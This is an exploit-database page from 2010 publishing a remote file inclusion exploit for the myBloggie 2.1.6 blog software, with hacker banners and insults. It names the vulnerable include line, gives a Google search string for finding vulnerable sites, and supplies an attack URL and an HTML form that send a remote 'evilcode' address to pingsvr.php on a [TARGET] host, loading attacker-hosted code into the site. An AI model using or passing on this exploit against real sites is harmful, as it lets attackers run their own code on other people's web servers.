[webapps / 0day] - myBloggie 2.1.6 - Remote file Inclusion E

Posted on 19 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>myBloggie 2.1.6 - Remote file Inclusion Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='myBloggie 2.1.6 - Remote file Inclusion Exploit by KnocKout in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===============================================
myBloggie 2.1.6 - Remote file Inclusion Exploit
===============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3                                                                      3
3             _     __       __    ________     __  __                 3
7           /&#039;   /&#039;__`   /&#039;__` /\_____     / /                 7
1          /\_, /\_L  /\_L \/___//&#039;/&#039;   \_   \____           1
3          /_/ /_/_\_&lt;_/_/_\_&lt;_   /&#039; /&#039;    /&#039;_`   &#039;__`          3
3               / L  / L  /&#039; /&#039;    / L   L          3
7               \_ \____/  \____//\_/       \___,_ \_,__/         7
1               /_//___/   /___/ //        /__,_ //___/          1
3              &gt;&gt; Exploit database separated by exploit                3
3                     type (local, remote, DoS, etc.)                  3
7                                                                      7
1          [+] Site            : 1337db.com                            1
3          [+] Support e-mail  : submit[at]1337db.com                  3
3                                                                      3
7               ############################################           7
1               I&#039;m KnocKout 1337 Member from 1337 DataBase            1
3               ############################################           3
3                                                                      3                                            
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
############################################################
fuck exploit(lamer)-DB.com Noobs..
KralÃ„Â±nÃ„Â±z gelsin. mua:) siksqlZkÃ„Â±rev..
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : myBloggie
|~Price : N/A
|~Version : 2.1.6
|~Software: http://mybloggie.mywebland.com
|~Vulnerability Style : Remote file Inclusion
|~Vulnerability Dir : /
|~sqL : MysqL 
|~Google Keyword : &quot;Powered by myBloggie Copyright Ã‚Â© 2004 2006&quot;
|[~]Date : &quot;19.12.2010&quot;
|[~]Tested on : (L):Vista (R):http://localhost/
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Line in 7
&lt;?php
..
include_once($mybloggie_root_path.&#039;includes/IXR_Library.inc.php&#039;);
..
?&gt;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| pingsvr.php File Inclusion~~~~~~~~~~~}|
    
    http://$localhost/$path/pingserver/pingsvr.php?mybloggie_root_path=$Evil?

    
    &lt;html&gt;
&lt;body&gt;
&lt;form 
action=&quot;http://[TARGET]/pingserver/pingsvr.php?mybloggie_root_path&quot; 
method=&quot;POST&quot;&gt;
&lt;input type=&quot;submit&quot; name=&quot;mybloggie_root_path&quot; value=&quot;http://evilcode?&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;



    To your continue..

    =============================================================
                .__        _____        _______                 
                |  |__    /  |  |___  __   _  \_______   ____  
                |  |    /   |  |  /  /  /_  \_  __ \_/ __  
                |   H  /    ^   /&gt;    &lt;  \_/     | /  ___/ 
                |___|  /\____   |/__/\_ \_____  /__|    \___  &gt;
                     /      |__|      /      /            / 
                         _____________________________  
                        /   _____/\_   _____/\_   ___  
                        \_____    |    __)_ /      / 
                        /         |        \     \____
                       /_______  //_______  / \______  /
                               /         /         /   Was here.
  ================================================================


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-19]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20